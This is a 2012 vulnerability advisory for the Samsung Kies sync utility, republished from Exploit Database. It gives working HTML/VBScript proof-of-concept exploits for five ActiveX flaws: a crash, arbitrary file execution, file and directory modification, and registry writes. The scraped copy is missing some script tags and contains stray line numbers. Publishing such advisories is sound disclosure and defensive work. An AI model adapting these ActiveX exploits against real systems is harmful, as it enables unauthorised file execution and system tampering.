Samsung Kies 2.3.2.12054_20 – Multiple Vulnerabilities

Exploit Database
97 阅读

作者： High-Tech Bridge SA

日期： 2012-10-16
类别：
- remote
平台：
- windows
来源：https://www.exploit-db.com/exploits/22007/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

317

318

319

320

321

322

323

324

325

326

327

328

329

330

331

Advisory ID: HTB23099

Product: Samsung Kies

Vendor: Samsung Electronics

Vulnerable Version(s): 2.3.2.12054_20 and probably prior

Tested Version: 2.3.2.12054_20

Vendor Notification: June 25, 2012

Public Disclosure: October 15, 2012

Vulnerability Type: NULL Pointer Dereference [CWE-476], Improper Access Control [CWE-284], Improper Access Control [CWE-284], Improper Access Control [CWE-284], Improper Access Control [CWE-284]

CVE References: CVE-2012-3806, CVE-2012-3807, CVE-2012-3808, CVE-2012-3809, CVE-2012-3810

CVSSv2 Base Scores: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P), 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P), 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P),5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P),5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P)

Solution Status: Fixed by Vendor

Risk Level: Medium

Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab has discovered multiple vulnerabilities in Samsung Kies synchronization utility that allows remote attacker to compromise affected system, execute and modify arbitrary files, modify arbitrary directories and modify System Registry with privileges of the current user.

1) Null Pointer Dereference in Samsung Kies: CVE-2012-3806

The vulnerability exists due to a null pointer dereference error in GetDataTable() method within the Samsung.DeviceService.DCA.DeviceDataParagonATGM.1 ActiveX control (DCAPARAGONGM.dll, GUID {7650BC47-036D-4D5B-95B4-9D622C8D00A4}, located by default in "C:\Program Files(x86)\Samsung\Kies\External\DeviceModules\"). A remote attacker can pass "tagDATATABLE_SUID" argument equal to 0 to the GetDataTable() method and rise an ACCESS_VIOLATION exception on a MOV EDX,[EAX] instruction, as EAX is previously zeroed by an unexpected NULL value in the memory region pointed by ECX:

Disassembly:

--------------------------------------------------

2A22B95 MOV ECX,[EBP+10]

2A22B98 MOV EAX,[ECX]

2A22B9AMOV EDX,[EAX]//Crash through

Null Pointer Dereference

2A22B9CPUSH 0

2A22B9E PUSH 0

2A22BA0PUSH 2A71E68

2A22BA5PUSH EAX

2A22BA6MOV EAX,[EDX+50]

2A22BA9CALL EAX

Registers:

--------------------------------------------------

EIP 02A22B9A

EAX 00000000

EBX 02A66774 -> 029E58F0

ECX 0022EBC0 -> 00000000

EDX 006DFCE2 -> 00030000

EDI 00000000

ESI 00000000

EBP 0022EB5C -> 0022EB7C

ESP 0022EB38 -> F2D508FE

The following Proof of Concept code causes a browser to crash:

<html>

<head>

<title>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</title>

</head>

Sub daPoC()

arg1=0

daTarget.GetDataTable arg1

End Sub

</script>

<body>

<h3>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</h3>

<h4>Null Pointer Dereference PoC</h4>

<hr>

This simple PoC will crash Internet Explorer.<BR><BR>

</body>

id='daTarget'></object>

</html>

2) Arbitrary File Execution in Samsung Kies: CVE-2012-3807

The CmdAgent.dll library, located by default in "C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\", has numerous arbitrary file execution vulnerabilities present in "CmdAgentLib" (GUID: {1FA56F8D-A66E-4ABD-9BC9-6F61469E59AD}), in particular in the 'ICommandAgent' interface of the "CommandAgent" class (GUID: {C668B648-A2BD-432C-854F-C8C0A275E1F1}). This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.

Arbitrary File Execution:

Run=> Vulnerable

RunAt=> Initial Exploit Test failed

RunAtNotExit => Initial Exploit Test failed

RunNotExit => Vulnerable

Arbitrary File Execution Proof of Concept:

<html>

<head>

<title>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</title>

</head>

Sub daPoC()

daFile="iexplore https://www.htbridge.com/advisory/HTB23099"

daTarget.Run daFile

End Sub

</script>

<body>

<h3>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</h3>

<h4>Arbitrary File Execution PoC</h4>

<hr>

This simple PoC will spawn IE and display more information about the vulnerability.<BR><BR>

</body>

</html>

3) Arbitrary File Modification in Samsung Kies: CVE-2012-3808

The CmdAgent.dll library, located by default in "C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\", has numerous arbitrary file modification vulnerabilities present in "CmdAgentLib" (GUID: {1FA56F8D-A66E-4ABD-9BC9-6F61469E59AD}), in particular in the 'ICommandAgent' interface of the "CommandAgent" class (GUID: {C668B648-A2BD-432C-854F-C8C0A275E1F1}). This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.

Arbitrary File Modification:

FileCopy => Vulnerable

FileCopySync => Vulnerable

FileDelete => Vulnerable

FileMove => Vulnerable

FileMoveExReboot => Initial Exploit Test failed

FileMoveSync => Vulnerable

Arbitrary File Modification Proof of Concept:

<html>

<head>

<title>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</title>

</head>

Set daShell = CreateObject( "WScript.Shell" )

daRoot=daShell.ExpandEnvironmentStrings("%SystemRoot%")

daFileCopySource=daRoot & "\System32\drivers\etc\hosts" daProfile=daShell.ExpandEnvironmentStrings("%USERPROFILE%")

daFileCopyDest=daprofile & "\Desktop\hosts"

daFileMoveDest=daprofile & "\Desktop\hosts.backup"

Sub daPoC()

daTarget.FileCopy daFileCopySource, daFileCopyDest

End Sub

Sub daPoC2()

daTarget.FileMoveSync daFileCopyDest, daFileMoveDest

End Sub

Sub daPoC3()

daTarget.FileDelete daFileMoveDest

End Sub

</script>

<body>

<h3>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</h3>

<h4>Arbitrary File Modification PoC</h4>

<hr>

This simple PoC will copy your <script language='vbscript'>document.write(daFileCopySource)</script> file into your desktop.<BR><BR>

<hr>

This simple PoC will move your <script language='vbscript'>document.write(daFileCopyDest)</script> file into <script language='vbscript'>document.write(daFileMoveDest)</script>.<BR><BR>

<input language=VBScript onclick=daPoC2() type=button value="Proof

of Concept">

<hr>

This simple PoC will delete <script language='vbscript'>document.write(daFileMoveDest)</script>.<BR><BR>

</body>

</html>

4) Arbitrary Directory Modification in Samsung Kies: CVE-2012-3809

The CmdAgent.dll library, located by default in "C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\", has numerous arbitrary directory modification vulnerabilities present in "CmdAgentLib" (GUID: {1FA56F8D-A66E-4ABD-9BC9-6F61469E59AD}), in particular in the 'ICommandAgent' interface of the "CommandAgent" class (GUID: {C668B648-A2BD-432C-854F-C8C0A275E1F1}). This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.

Arbitrary Directory Modification:

DirCreate=> Vulnerable

DirDelete=> Vulnerable

Arbitrary Directory Modification Proof of Concept:

<html>

<head>

<title>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</title>

</head>

Set daShell = CreateObject( "WScript.Shell" )

daProfile=daShell.ExpandEnvironmentStrings("%USERPROFILE%")

daDir=daprofile & "\Desktop\FRoGito"

Sub daPoC()

daTarget.DirCreate daDir

End Sub

Sub daPoC2()

daTarget.DirDelete daDir

End Sub

</script>

<body>

<h3>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</h3>

<h4>Arbitrary Directory Modification PoC</h4>

<hr>

This simple PoC will create the <script language='vbscript'>document.write(daDir)</script> directory.<BR><BR>

<hr>

This simple PoC will delete the <script language='vbscript'>document.write(daDir)</script> directory.<BR><BR>

</body>

</html>

5) Arbitrary Registry Modification in Samsung Kies: CVE-2012-3810

The CmdAgent.dll library, located by default in "C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\", has numerous Registry modification vulnerabilities present in "CmdAgentLib" (GUID: {1FA56F8D-A66E-4ABD-9BC9-6F61469E59AD}), in particular in the 'ICommandAgent' interface of the "CommandAgent" class (GUID: {C668B648-A2BD-432C-854F-C8C0A275E1F1}). This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.

Arbitrary Registry Modification:

RegiCreateKey=> Vulnerable

RegiDeleteKey=> Vulnerable

RegiDeleteTree => Vulnerable

RegiDeleteValue=> Vulnerable

RegiSetValueInt=> Vulnerable

RegiSetValueInt64=> Vulnerable

RegiSetValueString => Vulnerable

RegiSetValueString64 => Vulnerable

Arbitrary Registry Modification Proof of Concept:

<html>

<head>

<title>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</title>

</head>

daReg = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito"

daValueStrName = "PoC_str"

daValueStr = "frederic.bourla@htbridge.com"

daValueIntName = "PoC_int"

daValueInt = 8080

Sub daPoC()

daTarget.RegiCreateKey daReg

End Sub

Sub daPoC2()

daTarget.RegiSetValueString daReg, daValueStrName, daValueStr

End Sub

Sub daPoC3()

daTarget.RegiSetValueInt daReg, daValueIntName, daValueInt

End Sub

Sub daPoC4()

daTarget.RegiDeleteValue daReg, daValueStrName

daTarget.RegiDeleteValue daReg, daValueIntName

End Sub

Sub daPoC5()

daTarget.RegiDeleteKey daReg

End Sub

</script>

<body>

<h3>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</h3>

<h4>Arbitrary Registry Modification PoC</h4>

<hr>

This simple PoC will create the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito

registry key.<BR><BR>

<input language=VBScript onclick=daPoC() type=button value="Proof

of Concept">

<hr>

This simple PoC will create the string value 'PoC_str' initialized to 'frederic.bourla@htbridge.com' in the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGitoregistry key.<BR><BR>

<hr>

This simple PoC will create the int value 'PoC_int' initialized to 0x1F90 in the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito

registry key.

<input language=VBScript onclick=daPoC3() type=button

value="Proof of Concept">

<hr>

This simple PoC will delete both string and hex values from the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito registry key

<hr>

This simple PoC will delete the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito registry key.

</body>

id='daTarget'></object>

</html>

-----------------------------------------------------------------------------------------------

Solution:

Upgrade to KIES v2.5.0.12094_27_11

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23099 - https://www.htbridge.com/advisory/HTB23099 - Multiple vulnerabilities in Samsung Kies.

[2] Samsung Kies - http://www.samsung.com/ca/support/usefulsoftware/KIES/JSP - Samsung Kies is a freeware software application used to communicate between Windows or Macintosh computers, and more recently-manufactured Samsung mobile phone and tablet computer devices. Kies is Samsung's official tool for Android based devices which allows synchronization and multimedia files management.

[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.

[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.